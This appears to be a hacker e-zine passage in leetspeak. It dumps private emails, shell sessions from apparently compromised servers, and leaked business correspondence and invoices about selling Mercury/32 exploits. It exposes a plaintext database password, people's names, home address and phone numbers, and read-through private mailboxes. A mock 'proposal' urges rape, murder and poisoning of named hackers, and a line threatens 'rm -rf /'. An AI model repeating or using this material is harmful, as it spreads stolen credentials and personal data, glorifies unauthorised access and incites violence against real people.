Aftermath To: mark.aben@gmail.com Date: Jun 18, 2005 1:55 PM Subject: trade here :) m00seahouse-0.1.tar.gz 12K Download -~-~-~-~-~-~ th1z k1d h4z m0r3 0d4yz th4n 4ll 0f ESOH c0mb1n3d! -~-~-~-~-~-~ trade Aftermath to trelish173 Hide options 6/18/05 From: Aftermath Mailed-By: gmail.com Reply-To: Aftermath To: trelish173@yahoo.com Date: Jun 18, 2005 1:51 PM Subject: trade 2 attachments ó Download all attachments 0day_vb_source._virus.zip 6K Download m00seahouse-0.1.tar.gz 12K Download -~-~-~-~-~-~ dr1p dr1p dr1p, c4ll th3 plumb3r.. w3 g0t a l34k! -~-~-~-~-~-~ Article Submission Cloakin Dagger to newsroom Hide options 12/3/05 From: Cloakin Dagger Mailed-By: gmail.com To: newsroom@terracestandard.com Date: Dec 3, 2005 4:11 PM Subject: Article Submission I have attached a article in .txt format along with this Email. I choose to remain annonymous due to the nature of this article. If you are going to read it in word pad or note pad, don't forget to turn word wrap on. If you wish, and if the article is published, you can change the by-line to "annonymous" or anything you choose. New Legalization Ideas.txt 4K View Download -~-~-~-~-~-~ n0t 4n0nym0uz n0w -~-~-~-~-~-~ k-1ine submission Aftermath to theclone Hide options 8:56 pm (4 hours ago) From: Aftermath Mailed-By: gmail.com To: theclone@hackcanada.com Date: Feb 7, 2006 8:56 PM Subject: k-1ine submission Hey Clone. I dont know if you remember, but I told you I was working on another virus text. I've been working on it on and off for almost a year now. Its finaly done. I finished it last night, right before my computer crashed and refused to start again. Luckaly I saved it to my usb drive before that happend. I hope you dont mind me going under the name "TwoTwenty" for this article, I just dont want my handle "Aftermath" to be syonomus with viruses. -Aftermath VB_source_code_virus_revisited.txt 70K View Download -~-~-~-~-~-~ pl41n t3xt 3m41lz 4r3 v3ry s4f3 f0r th3 4n0nym0uz! -~-~-~-~-~-~ Aftermath to b9u4ea Hide options Apr 4 From: Aftermath Mailed-By: gmail.com To: b9u4ea@gmail.com Date: Apr 4, 2006 2:37 AM Subject: BoW hackers and Edmonton hey buddy, i dono if this is the u4ea from BoW, but i heard it was, and that you were in Edmonton. If you ever want to meet up with some serioulsy cool phreaks in E-town, give me a holler back. These guys I know arn't lame. they are the real deal. -Aftermath -~-~-~-~-~-~ BoW w0uld fuqn d3str0y y0u! -~-~-~-~-~-~ cdej song Aftermath to lozcarenator Hide options Mar 24 From: Aftermath Mailed-By: gmail.com To: lozcarenator@gmail.com Date: Mar 24, 2006 5:04 PM Subject: cdej song Lyrics go: this is a dangrous group.. groups that we are dealing with ... and ... it was a nightmare its about cdej being so elite that the whole planet pjeerz and thinks its a nightmare taht cdej rux so much and is very dangerous made with fruity loops it was a nightmare.mp3 4416K Download -~-~-~-~ cdej n33dz t0 g3t th3m s0m3 sk1llz.. 0r rm -rf / w1ll c0m3. -~-~-~-~ s Aftermath to c Hide options Apr 21 From: Aftermath Mailed-By: gmail.com To: c@cdej.org Date: Apr 21, 2006 1:33 AM Subject: s hey you should ask bob if you can use this before publishing it.. all the good code in it is his. zine.txt 76K View Download -~-~-~-~-~-~ w0uld cdej lyk3 t0 us3 th1z 4rt1cl3 4sw3ll? fuqn l00z3rz. -~-~-~-~-~-~ 14.txt -~-~-~ majestic 4x3d. l34rn t0 h4q. fuqn l4m3r. y0u r 4x3d! majestic@nox ~ $ id uid=1110(majestic) gid=100(users) groups=100(users) majestic@nox ~ $ uname -a Linux nox 2.6.11-gentoo-r11 #1 Tue Jun 14 12:34:43 EDT 2005 i686 AMD Athlon(tm) XP 2700+ AuthenticAMD GNU/Linux majestic@nox ~ $ ls -al total 31 drwx------ 4 majestic users 360 Oct 7 22:33 . drwxr-xr-x 96 root root 2520 Jan 15 12:01 .. -rwxr-xr-x 1 majestic users 812 Nov 28 2003 ._cfg0000_.bashrc -rwxr-xr-x 1 majestic users 3741 Nov 16 18:36 .bash_history -rwxr-xr-x 1 majestic users 232 Nov 28 2003 .bash_profile -rwxr-xr-x 1 majestic users 806 Nov 28 2003 .bashrc drwx------ 2 majestic users 80 Oct 7 22:22 .ssh -rwxr-xr-x 1 majestic users 1466 Nov 28 2003 .tcsh.config -rwxr-xr-x 1 majestic users 7549 Nov 29 2004 .viminfo -rw-r--r-- 1 majestic users 0 Nov 29 2004 .viminfo.tmp drwx------ 24 majestic users 728 Nov 6 15:56 Maildir lrwxrwxrwx 1 majestic users 46 Jan 29 2005 cgi-bin -> /mg2root/web/electroindustrial.mg2.org/cgi-bin lrwxrwxrwx 1 majestic users 43 Jan 29 2005 www -> /mg2root/web/electroindustrial.mg2.org/html majestic@nox ~ $ w 21:26:01 up 33 days, 23:34, 3 users, load average: 0.08, 0.05, 0.04 USER TTY LOGIN@ IDLE JCPU PCPU WHAT corrupt pts/0 Sun11 33:24m 0.00s 0.01s sshd: corrupt [priv] root pts/2 13Dec05 7days 0.01s 0.01s -bash tony pts/3 05Jan06 11days 0.40s 0.40s vim main_page.tt2 majestic@nox ~ $ cd Maildir majestic@nox ~/Maildir $ ls -al total 198 drwx------ 24 majestic users 728 Nov 6 15:56 . drwx------ 4 majestic users 360 Oct 7 22:33 .. drwx------ 6 majestic users 256 Mar 24 2004 .Drafts drwx------ 6 majestic users 256 Dec 18 2004 .K-7 drwx------ 6 majestic users 256 Dec 20 2004 .MCBG drwx------ 6 majestic users 256 Dec 20 2004 .Misc drwx------ 6 majestic users 256 Feb 22 2005 .NTheory drwx------ 6 majestic users 256 Dec 20 2004 .Paypal drwx------ 6 majestic users 256 Dec 31 2004 .Phreak drwx------ 6 majestic users 256 Feb 22 2005 .Phreaker drwx------ 6 majestic users 256 May 8 2004 .Read these drwx------ 6 majestic users 256 Jun 15 2005 .Sent drwx------ 6 majestic users 256 Feb 22 2005 .Stanaphone drwx------ 6 majestic users 256 Jun 21 2005 .Trash drwx------ 6 majestic users 256 Dec 20 2004 .amazon drwx------ 6 majestic users 256 Dec 20 2004 .douwd drwx------ 6 majestic users 256 Dec 20 2004 .mg2 drwx------ 6 majestic users 256 Dec 17 2004 .natas drwx------ 6 majestic users 256 Jun 14 2005 .nokia drwx------ 6 majestic users 256 Feb 22 2005 .voipjet drwx------ 2 majestic users 48 Jun 21 2005 courierimapkeywords -rwxr-xr-x 1 majestic users 230 Feb 22 2005 courierimapsubscribed -rw-r--r-- 1 majestic users 55938 Nov 6 15:56 courierimapuiddb -rwxr-xr-x 1 majestic users 608 Mar 24 2004 courierpop3dsizelist drwxrwx--- 2 majestic majestic 88608 Nov 6 15:56 cur drwxrwx--- 2 majestic majestic 48368 Jan 16 20:37 new drwxrwx--- 2 majestic majestic 48 Jan 16 20:37 tmp majestic@nox ~/Maildir $ cd .Sent/cur majestic@nox ~/Maildir/.Sent/cur $ cat * Received: from 141.217.174.135 (SquirrelMail authenticated user majestic) by secure.mg2.org with HTTP; Thu, 19 Feb 2004 13:51:01 -0500 (EST) Message-ID: <1804.141.217.174.135.1077216661.squirrel@secure.mg2.org> In-Reply-To: <000801c3f295$6f28ce60$d4349144@cg.shawcable.net> References: <000801c3f295$6f28ce60$d4349144@cg.shawcable.net> Date: Thu, 19 Feb 2004 13:51:01 -0500 (EST) Subject: Re: From: majestic@mg2.org To: "Paul Wolfenden" User-Agent: SquirrelMail/1.4.2 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 Importance: Normal Return-Receipt-To: majestic@mg2.org YO, I am working on a newer porn site .. just for fun... http://thefiesta.smutstars.com Check it and get back to me! Anything you wanna submit throw me the URL and I can give you props lata! Received: from 141.217.41.203 (SquirrelMail authenticated user majestic) by secure.mg2.org with HTTP; Thu, 13 May 2004 22:29:45 -0400 (EDT) Message-ID: <2068.141.217.41.203.1084501785.squirrel@secure.mg2.org> Date: Thu, 13 May 2004 22:29:45 -0400 (EDT) Subject: Datu's From: majestic@mg2.org To: nyphonejacks@yahoo.com User-Agent: SquirrelMail/1.4.2 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 Importance: Normal I can't thank you enough brother ... Please feel free to contact me about any Datu News, as you are one of the best on my page... Please stay in touch, as i was a follower of ANTIVERIZON! You'll always have a place for txt files on my site! Majestic ... Please read these: http://majestic.douwd.org/Sass/Majestic.txt http://majestic.douwd.org/nyphonejacks/Sass/Majesti-Grey.txt umm keep it to your eyes only ... but yeah... Received: from 141.217.41.212 (SquirrelMail authenticated user majestic) by secure.mg2.org with HTTP; Fri, 27 Aug 2004 15:35:12 -0400 (EDT) Message-ID: <1826.141.217.41.212.1093635312.squirrel@secure.mg2.org> In-Reply-To: <935acd92040826220060410c5b@mail.gmail.com> References: <935acd92040826220060410c5b@mail.gmail.com> Date: Fri, 27 Aug 2004 15:35:12 -0400 (EDT) Subject: Re: luna.hbx.us From: majestic@mg2.org To: "Michael Wally" User-Agent: SquirrelMail/1.4.2 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 Importance: Normal I tried this with my username and got nothing ... I am going to try some more, if you can, please check on this please .. I have the html and image folder in the public_html file folder, but can't seem to ge tit moving! http://luna.hbx.us/~username/ Received: from 141.217.41.235 (SquirrelMail authenticated user majestic); by secure.mg2.org with HTTP; Mon, 20 Dec 2004 14:47:07 -0500 (EST) Message-ID: <1857.141.217.41.235.1103572027.squirrel@141.217.41.235> Date: Mon, 20 Dec 2004 14:47:07 -0500 (EST) Subject: sql pass From: majestic@mg2.org To: majestic@mg2.org User-Agent: SquirrelMail/1.4.3a X-Mailer: SquirrelMail/1.4.3a MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal Password for majestic set to QwOCAVio majestic@nox ~/Maildir/.Sent/cur $ cd /mg2root/web/ majestic@nox /mg2root/web $ ls -al total 3 drwxr-xr-x 59 root root 1984 Jan 2 21:31 . drwxr-xr-x 8 root root 216 Jun 2 2005 .. drwxr-s--- 7 admiral webserv 176 Jul 9 2003 admiral.mg2.org drwxr-s--- 7 benk webserv 176 Nov 18 2004 benk.mg2.org drwxr-s--- 8 root webserv 200 Aug 20 2002 bizkuts.mg2.org drwxr-s--- 6 716 webserv 176 Sep 20 17:03 blujazz.org drwxr-sr-x 8 corrupt webserv 200 Jan 11 2004 bot.mg2.org drwxr-s--- 7 brandon webserv 176 May 12 2005 brandon.mg2.org drwxr-s--- 7 farming webserv 176 Aug 26 2003 cap.mg2.org drwxr-s--- 11 corrupt webserv 280 Jan 18 2005 cma.mg2.org drwxr-s--- 7 dante8 webserv 176 Dec 30 2003 dante8.mg2.org drwxr-s--- 8 corrupt webserv 240 Oct 30 01:00 davtest.mg2.org drwxr-xr-x 9 deftekno deftekno 224 May 22 2003 decypher.org drwxr-s--- 12 deftekno webserv 376 Apr 19 2005 deftekno.mg2.org drwxr-s--- 7 delvis webserv 200 Feb 8 2005 delvis.mg2.org drwxr-s--- 7 1059 webserv 176 Jul 12 2004 dew.mg2.org drwxr-s--- 7 majestic webserv 176 Jun 21 2005 electroindustrial.mg2.org drwxr-xr-x 8 860 chui101 200 Jul 29 2003 filter.mg2.org drwxr-s--- 10 q webserv 248 Dec 4 2004 girls-suck.net drwxr-s--- 8 nick webserv 200 Aug 20 2002 gypsy.mg2.org drwxr-s--- 8 jacob webserv 200 Aug 20 2002 jacob.mg2.org drwxr-sr-x 10 cent webserv 456 May 9 2005 jeek.net drwxr-s--- 7 corrupt webserv 232 Apr 20 2005 katy.mg2.org drwxr-s--- 3 root webserv 80 Aug 20 2002 lost+found drwxr-x--x 6 cent webserv 208 Apr 20 2005 malk.jeek.net drwxr-sr-x 9 corrupt webserv 336 Dec 14 2004 michael.gregorowicz.com drwxr-xr-x 8 nin webserv 200 Mar 6 2004 nin.mg2.org drwxr-s--- 8 q webserv 296 Sep 16 21:19 q.mg2.org drwxr-s--- 8 716 webserv 200 Aug 20 2002 rasta.mg2.org drwxr-s--- 8 reflecks webserv 200 Aug 20 2002 reflecks.mg2.org drwxrwxrwx 8 shell webserv 200 Feb 9 2004 reserve.mg2.org drwxr-s--- 17 secweb secweb 1984 Jan 15 11:58 secure.mg2.org drwxr-s--- 8 shaan webserv 264 Aug 13 21:17 shaan.mg2.org drwxr-s--- 9 tracks webserv 264 Oct 21 2004 tracks.mg2.org drwxr-s--- 7 ucbs webserv 176 Apr 2 2004 ucbs.mg2.org drwxr-s--- 8 wuf webserv 240 Oct 18 01:00 wakeupfuckers.com drwxr-sr-x 9 swassef webserv 264 Nov 17 11:16 wassef.net drwxr-s--- 8 wedding webserv 240 Oct 18 01:00 wedding.mg2.org drwxr-s--- 6 corrupt webserv 152 Aug 25 01:00 whatever.mg2.org drwxr-s--- 7 nick webserv 176 Aug 20 2002 wmls.mg2.org drwxr-s--- 7 wwjp4u webserv 176 Jan 9 2004 wwjp4u.mg2.org drwxr-s--- 6 deftekno webserv 152 Aug 21 01:00 www.b-evil.com drwxr-s--- 8 binary webserv 200 Sep 23 11:30 www.binarydetroit.com drwxr-s--- 12 xroads webserv 352 Jul 5 2005 www.crossroadsofmichigan.org drwxr-s--- 6 dragan webserv 152 Oct 28 01:00 www.dragan.org drwxr-xr-x 8 ogre ogre 200 Nov 23 15:02 www.dragontear.org drwxr-s--- 7 bleach webserv 176 Oct 25 2004 www.exodusls.com drwxr-s--- 6 tgif webserv 152 Oct 29 01:00 www.fridaysrule.org drwxr-xr-x 10 corrupt webserv 296 Oct 21 2004 www.gregorowicz.com drwxr-s--- 8 tony webserv 240 Jan 3 01:00 www.lessthanthree.com drwxr-s--- 9 majeo webserv 248 Jan 7 2004 www.majeo.ro drwxr-s--- 8 corrupt webserv 240 Nov 9 01:00 www.mg2.org drwxr-s--- 8 analog38 webserv 200 Aug 19 15:48 www.myonelastchance.com drwxr-s--- 8 anvil webserv 200 Oct 24 12:21 www.plastercine.org drwxr-s--- 9 sica webserv 224 Oct 27 2004 www.redflux.com drwxr-s--- 6 jacob webserv 152 Sep 1 01:00 www.sleepforever.com drwxr-s--- 10 soko webserv 312 Nov 4 01:00 www.soko2000.com drwxr-s--- 6 brandon webserv 152 Sep 3 10:49 www.toaster-of-doom.com drwxr-s--- 7 zcqw4a1 webserv 176 Feb 17 2004 zcq.mg2.org f0rg0t 2l4m32h4x.mg2.org 15.txt -~-~-~ a pr0p0s4l 4 3b4y3rz d34r c0nsum3rz 0f th3 1nt3rn3t, th1s 1s h0no, w3 4r3 4 gr0up 0f 3 h4ck3rz wh0 r34lly w1sh t0 3xt3nd 0ur rm'1ng p0w3r. 1n0rd3r t0 d0 th1z w3 n33d s0m3 h3lp!!! us1ng jtr t0 cr4ck n0b0dy 4cc0untz 4ll d4y 1s t1r3ds0me.. w3 n33d p30pl3 w1th s0m3 sk1llz! 4ft3r th3 gr34t 1d34 0f s3ll1ng 3xc3l 0d4yz & a p3n 0n 3b4y w3 h4v3 d3c1d3d t0 us3 3b4y 4s 0ur f0rm 0f h4q-4-h1r3. w3 w1ll b3 p0zt1ng 1 m0th3rfuq3r p3r m0nth wh0 1z juzt t00 3l1t3 f0r us3 t0 fuckz w1th. 1f y0u c4n 0wn h1m, s3nd uz th3 0d4y y0u us3d & y0u w1ll g3t th3 r3w4rd 0f 15 m1nz 0f fr33 c4ll1ng k4rdz. 0r 1f y0u w1sh 4 s1gn3d c0py 0f th3 c1zc0 I0S src. t0 g3t th1ngz st4rt3d w3 w1ll p0st th3 f1rst 6 el1t3z s0 y0u c4n g3t 4n 34rly jump 0n th3 c0mp1t10n. 1t3m #1: 0wn1ng 0f fl4tl1n3 4l14s: fl4tt1r3. l33tsecuritycumbuck3t bi0: 4dm1nz greyhat.nl & blackhat.nl l1k3 a ch4mp! piq: < -8 u 8- > fav quote: "public/private, i don't give a shit" fl4tl1n3 1s 4 f3ll0w dutch wh0 3nj0yz h3lp1ng bys1n sp4m & d1str1but1ng h1s 3 y34r 0ld s4mb4 3xpl01t. h3 r34lly c4nt h4ck, but m4k3z fun 0f z3n0m0rph & ADM.. s0 h3 muzt b3 3l1t3. fl4tl1n3 suckz d1q @ xs4all.nl t0 g3t th3 0d4y t1 l1n3 h3 uz3z t0 1dl3 0n #l33tsecurity... 4nd d0nt y0u d4r3 t3ll h1z c4bl3 c0mp4ny 4b0ut h1m unscr4mbl1ng th3 sp1c3 ch4nn3l! (th1z 1z why h3 1z 4fk 4ll d4y). f0r h4ql0g 0f th1s l4m3r w3 4r3 w1ll1ng t0 g1v3 up 0ur p3rs0n4l s4mb4 0d4y wh1ch w0rkz n34rly 4s g00d 4s fl4tl1n3'z. 1t3m #2: br34k1ng up r4v3 & styx ~-~ r4v3 ~-~ 4l14s: j0hnny cumbuck3t bi0: c4tch3z cum f0r a l1v1ng. piq: <;; X ;;> fav quote: "suq diq" ~-~ styx ~-~ 4l14s: whore bi0: is a whore piq: >-80 fav quote: "suq diq" th1z pr0p0s4l h4z alr34dy b33n fullf1ll3d. 1t3m #3: phys1c4lly br34k1ng m0rn1ng_w00d'z g00d 4rm 4l14s: d0nn1e cumbuck3t bi0: wr1t3z n34r n3w y0rk tym3z qu4l1ty 4rt1cl3z 0n zone-h.org! piq: >-0- fav quote: "No fix on 0day" 1t3m #4: p0s10n1ng awk'z st3r10dz 4l14s: awk, muzl3m4n, p1llp0pp3r bi0: awk can grawl. piq: ()----X-----() fav quote: "GRRAWWWLLL!!@# 0D4YZ!@# GRRRWWAAWWWLLL!!@#!@#" th1z 0v3r gr0wn ap3 c4nt s33m t0 qu1t ju1c1ng. f0r h1z s4ft3y 4nd 0urz plz 1nj3ct h1z st3r10dz w1th 4z much strychn1n3 4z p0zz1bl3. 1t3m #5: r4p3 & murd3r 0f r4f4 4l14s: rafa bi0: w1ll d4zzl3 y0u w1th h1z gr4ph1x th3n 0wn y0u w1th DDoS!! piq: | | | | :{ | | | | fav quote: "DDoS this for me" th1z h4q3r turn3d m0d3l h4z w3nt fr0m b0x.sk f4m3 2 f8l4bz 2 pr1s0n 1n 2 sh0rt y34rz. wh4t h4pp3nd r4f4? h0w d1d y0u f4ll fr0m gr4c3 s0 fuqn qu1ck? 1n0rd3r t0 f1n1sh th3 j0b & r1d th3 w0rld 0f th1z fuqn scumbuck3t, h0no pr0p0s3z th4t r4f4 b3 r4p3d wh1l3 1n pr1s0n. 1f p0ss1bl3 k33p h1m 4l1v3 l0ng 3n0ugh t0 sh1t 0n h1z f4c3. th3z3 4r3 4ll 0f th3 pr0p0s4lz w3 c4n cum up w1th f0r n0w!! g00d luck!!@ 16.txt -~-~-~ kf g03z br0k3 n0th1ng t0 s4y but g00d luck w1th digitalmunition! From: Kevin Finisterre To: "Robert E. Desautels" , "Adriel T. Desautels" Subject: loot is in the mail ala fedx. I was told this morning that 16k is in the mail ala fedx from HB. I wanted to remind all parties involved that that LAST check that came in I was told I would be paid the outstanding $1200 bones... due to a misunderstanding this did not happen. During the post mortum on this incident it was once again agreed upon that with the NEXT HB check (this one) my 1200 bones would be paid in full in addition to my normal %age of the check. I would rather be paid in w2 form if possible... I am not interested in the whole 1099 B.S. next year at tax time (uncle sam raped me in the ass). Take my taxes now if you can. John should be paid his percentage in a manor that does NOT involve me as I am no longer involved in the company. 1099 vs. w2 is a conversation someone other than me needs to have with him... Thanks for your time. -KF P.S. If I need to dig up the email trail where the statements about the 1200 bones were made I certainly can... From: Kevin finisterre To: "Robert E. Desautels" , Robert Desautels , "Adriel T. Desautels" , loki , jtibbs , john@oxideas.com, JohnH , kf@digitalmunition.com Subject: Invoice for Mercury/32 This is the invoice (if necessary) for the Mercury/32 items. -KF --------------020602010701080109040309 filename="Invoice1.txt" Kevin Finisterre - DigitalMunition.com 957 Sells Ave. Columbus, Ohio 43212 (614)209-6737 Invoice sent via email: 03/11/05 Payment is due upon recepit. TO: Secure Network Operations 1740 Mass Ave Boxborough, MA 01719 RE: 33% of 16k payment for Mercury/32 exploit via HBGary Inc. Date of agreement: Roughly September of October of 2004 Witness to agreement: Adriel T. Desautels. , Robert E. Desautels, John Hale Description of purchase: $5280 Payment for research and development of Mercury/32 Ph exploit. 13% of this payment will be paid to John Hale for services rendered. Total Due: $5280.00 NOTICE: Further delinquency in payment will result in a 1.5% fee per month of non payment. After 2 months a collection agency will be involved. Cc: "'Kevin Finisterre'" , "'loki'" , "'Adriel T. Desautels'" From: jtibbs Subject: Re: loot is in the mail ala fedx. Date: Fri, 11 Mar 2005 15:22:19 -0600 To: "Robert E. Desautels" Jesus Freaking Christ! Enough already. This is business, this is not a personal issue, if your taking it personal STOP NOW. Kevin is owed money. We are going to pay him money. Whether or not anyone is pissed at him or he is pissed at anyone else is MOOT! So further communication from either side should and WILL be in the upmost professional manner. Kev is owed money, he's been owed this money for quite some time now. Kev you'll be paid within 30 days just like I told you on the phone. We all know he was owed this money, to stop and play games like this on both sides is really getting on my last nerve. So Kev.. you invoiced us. If there is a discrepancy with the percentage we need to discuss this, otherwise your payments will be made within the next 30 days or as is my understanding. Am I wrong on this? If so Adriel or Red, do please let me know so I can figure out where the communication line was broken. Thanks Justin From: "Adriel T. Desautels" To: "'Kevin Finisterre'" , "'Robert E. Desautels'" Cc: "'jtibbs'" , "'loki'" Subject: RE: loot is in the mail ala fedx. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Guys, End this thread. I don't want to see emails from anyone to anyone regarding this topic any more. Kevin, you will be paid what you are owed in accordance with the terms that RED set fourth. I will sit down with Red and Will on Monday to create a letter of intent for you to formalize this issue. Email is not a way to iron this out. Adriel T. Desautels Founder and CTO Secure Network Operations Embracing the future of technology, protecting you. Office: 978-263-3829 Fax: 978-263-3313 atd@secnetops.com www.secnetops.com - -----Original Message----- From: Kevin Finisterre [mailto:kf@digitalmunition.com] Sent: Friday, March 11, 2005 4:30 PM To: Robert E. Desautels Cc: 'jtibbs'; 'loki'; 'Adriel T. Desautels' Subject: Re: loot is in the mail ala fedx. Robert... quick playing fucking games with me man. I am sick of you trying to push my buttons in order to invoke responses like this. You basically asked me to send you an invoice so that you could pull this 30 day BS... As stated in the invoice payment is due immediately. Not in 30 days. I am not a "Supplier" I was supposed to be a partner... As for our "Original agreement" the agreement never stated that I had to pay John H any money at all... it was implied to me that John would be pay BY SNO... Kevin you get "30%" is not Kevin you get "30%" and get to pay john H.... so don't go there... And since we are on the subject of disrespect... I hope you don't fuck all your partners in the ass... thats extremely disrespectful. have a nice day. - -KF Robert E. Desautels wrote: >Kevin, > >I find it hard to understand why you can not comprehend that I would > find the tone and choice of words in your previous e-mails to me to >be disrespectful and insulting. In the future please communicate >with me in a professional and courteous manner befitting of your >talent and intellect. > >Regarding your invoice to Secure Network Operations the company's >normal payment terms are net 30 days from receipt of invoice, which >is industry standard. In cases where a supplier offers prompt >payment discounts of 2.5% an accelerated payment schedule of net 15 >days can be accommodated. > >Finally our original agreement was for 30% not 33%. We made an >exception on the last payment to you and paid you at the 33% rate. >If you have documentation that shows me to be wrong please provide >it and I will take it under consideration. > >Thanks and best regards, > >Robert Desautels > >-----Original Message----- >From: Kevin Finisterre [mailto:kf@digitalmunition.com] >Sent: Friday, March 11, 2005 3:32 PM >To: Robert E. Desautels >Subject: Re: loot is in the mail ala fedx. > >Please point out the insult? I must have missed it... I simply >stated the facts. Insulting you was not my intent... expressing my >extreme displeasure in the actions that have occured was the goal. > >-KF > >Robert E. Desautels wrote: > > >>Kevin, >> >>Insulting me is not a good way to motivate me. >> >>Best regards, >> >>RED >> >>-----Original Message----- >>From: Kevin Finisterre [mailto:kf@digitalmunition.com] >>Sent: Friday, March 11, 2005 11:38 AM >>To: Robert E. Desautels >>Cc: 'Adriel T. Desautels'; 'loki'; jtibbs >>Subject: Re: loot is in the mail ala fedx. >> >>Fine... I'll take the 1099 and I'll pay john... I can understand >>that I guess. >> >>and since conviently you have fogotten once again I'll find the >>emails... you should try searching you own inbox.... btw. This is >>twice I have had to dig up emails you should have... just because >>you 'forgot' >> >>This $1200 bucks has been owed since sept of last year at least.... >> its pathetic that you are still trying to put the payment off... >> >> >>(very pissed) -KF >> >> >>Robert E. Desautels wrote: >> >> >> >> >>>Kevin, >>> >>>Regarding what is owed to John. How much is it? If you do not >>>want to pay John I will but it will be deducted from the 30%. >>>Please make sure that I have John's name, address, city, >>>state,zip, and ss# so I can file a 1099 >>> >>> >>for >> >> >> >>>him when the time comes. >>> >>>Once I the info I need from you regarding John I will send you >>>each your respective fee payments. >>> >>>Thanks >>> >>>RED >>> >>>-----Original Message----- >>>From: Kevin Finisterre [mailto:kf@digitalmunition.com] >>>Sent: Friday, March 11, 2005 10:38 AM >>>To: Robert E. Desautels; Adriel T. Desautels >>>Subject: loot is in the mail ala fedx. >>> >>>I was told this morning that 16k is in the mail ala fedx from HB. >>> >>>I wanted to remind all parties involved that that LAST check that >>>came in I was told I would be paid the outstanding $1200 bones... >>>due to a misunderstanding this did not happen. >>> >>>During the post mortum on this incident it was once again agreed >>>upon that with the NEXT HB check (this one) my 1200 bones would >>>be paid in full in addition to my normal %age of the check. >>> >>>I would rather be paid in w2 form if possible... I am not >>>interested in the whole 1099 B.S. next year at tax time (uncle >>>sam raped me in the ass). Take my taxes now if you can. John >>>should be paid his percentage in a manor that does NOT involve me >>>as I am no longer involved in the company. 1099 vs. w2 is a >>>conversation someone other than >>> >>> >me needs to have with him... > > >>>Thanks for your time. >>> >>>-KF >>> >>>P.S. If I need to dig up the email trail where the statements >>>about the >>> >>> >>1200 >> >> >> >>>bones were made I certainly can... >>> >>> >>> >>> >>> >>> >>> >>> >> >> >> >> >> > > > > > -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBQjIR0LR5YB3MHZrzEQLPAwCeL+KWcwnbzkAQ/Zw6m6ZRj2zAAY0AnR5j qRyE0fT1G9TihnIZht9pxPMz =XkXB -----END PGP SIGNATURE----- --------------070300080701090706040507 Content-Type: text/plain; name="KF.txt" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="KF.txt" tax on KF needs to be accounted for. Out of 4 items that we were P.O.'d for we have been paid for 3 and you are entitled to 13% for 2 of these items. You are also entitled to hourly pay for items that were sold or that we agreed you would be paid for. The items that sold were and involve you are: $3000 itunes - KF collected $1000 on 10/18/04 $16000 mercury #1 - KF collected $5280 on 04/03/05 Items pending sale are: veritas cso (dead item) - traded for mercury #2 per client request. sold items pending pay are: $12000 mercury #2 - KF has collected $0 on this item. 50/50 split upon arrival. Your entitlement of percentage is for itunes and mercury #1. The stated percentage was 13% of KF's take home for each item. If CSO is sold the same rules apply. $130 - itunes entitlement $686.40 - mercury #1 entitlement As of 10/25 the hours that I have recorded as 'payable' hours are: mercury vuln #1 = 7.5 hours mercury vuln #2 = will be dealt with seperately since it was not sold through SNO - kaffiene = 5 hours. This vuln was not exploited nor sold. vertias = 9.5 hrs. This will be negotiated upon sale of veritas items. gpsd = 6 hours. Item was not sold but was exploited. ITunes = 16 hours work. Item was sold and exploited. Total 44 hours of work @38 per hour. $1672 (when I paid you out of pocket it was 26 an hour) Your total entitlement is: Hourly $1672 %age $816.4 Total $2488 To date I have paypal'd you $1168 The payment breakdown is as follows: Jan. 6, 2005 Payment To John Hale Completed Details -$450.00 USD $0.00 USD -$450.00 USD Nov. 4, 2004 Payment To John Hale Completed Details -$100.00 USD $0.00 USD -$100.00 USD Oct. 22, 2004 Payment To John Hale Completed Details -$168.00 USD $0.00 USD -$168.00 USD Oct. 20, 2004 Payment To John Hale Completed Details -$225.00 USD $0.00 USD -$225.00 USD Sep. 20, 2004 Payment To John Hale Completed Details -$225.00 USD $0.00 USD -$225.00 USD Total owed. $1320 From: Kevin Finisterre To: penny@hbgary.com, JohnH , Bob Slapnik Subject: Invoice from Kevin Finisterre This is a multi-part message in MIME format. --------------030804010207090205070906 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit --------------030804010207090205070906 Content-Type: text/plain; name="Invoice1.txt" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="Invoice1.txt" Kevin Finisterre - DigitalMunition.com 957 Sells Ave. Columbus, Ohio 43212 (614)209-6737 Invoice sent via email: 06/14/05 Payment is due upon recepit. TO: HBGary Headquarters 574 E Weddell Drive, Suite 8 Sunnyvale, CA 94089 or HBGary East Coast Office 7212 Chestnut Street Chevy Chase, MD 20815 RE: 12k payment for Mercury/32 exploit #2 via HBGary Inc. Date of agreement: Roughly November or December of 2004 Witness to agreement: John Hale Description of purchase: $12,000 Payment for research and development of Mercury/32 PopPass exploit. $6,000 of this payment will be paid to John Hale for services rendered on behalf of Kevin Finisterre. Total Due: $12,000.00 The check should be made payable to "Kevin Finisterre" 17.txt -~-~-~ d4rp4n3t/d1s.0rg fuqt4rd s31z3d Th1z 1z n0 cl0wn b0yz & g1rlz, 1t 1z j0k3r fr0m th3 m0thrfuck1n d4rp4n3t. 0r 4z h1s fr13ndz c4ll h1m, enr1que th3 3rd (0r 1n pr1s0n 4s 'e4zy l4y enr1que' 4z h3 h4d a t3nd3ncy t0 dr0p th3 s04p.) g1v3z h0no 4n 4ll 3xclus1v3 p4zz @ th3 w0rld f4m0uz d1z.org sh3ll b0x. Th4nkz d00d! w3 f0und 4n0th3r d4rp4 fuq 2 0wn 2 sh1t. 4r3 y0u sur3 y0u w4nt t0 t4ng0 c4m3l? [root@theamericanunderground] # pwd /root [root@theamericanunderground] # ls -al total 24888 drwxr-xr-x 10 root wheel 512 Jul 13 09:16 . drwxr-xr-x 22 root wheel 512 Sep 4 2005 .. -rw------- 1 root wheel 8826 May 14 2005 .bash_history drwxr-xr-x 2 root wheel 512 Jan 31 22:34 .bashrd -rw-r--r-- 1 root wheel 802 Nov 7 2003 .cshrc -rw-r--r-- 1 root wheel 142 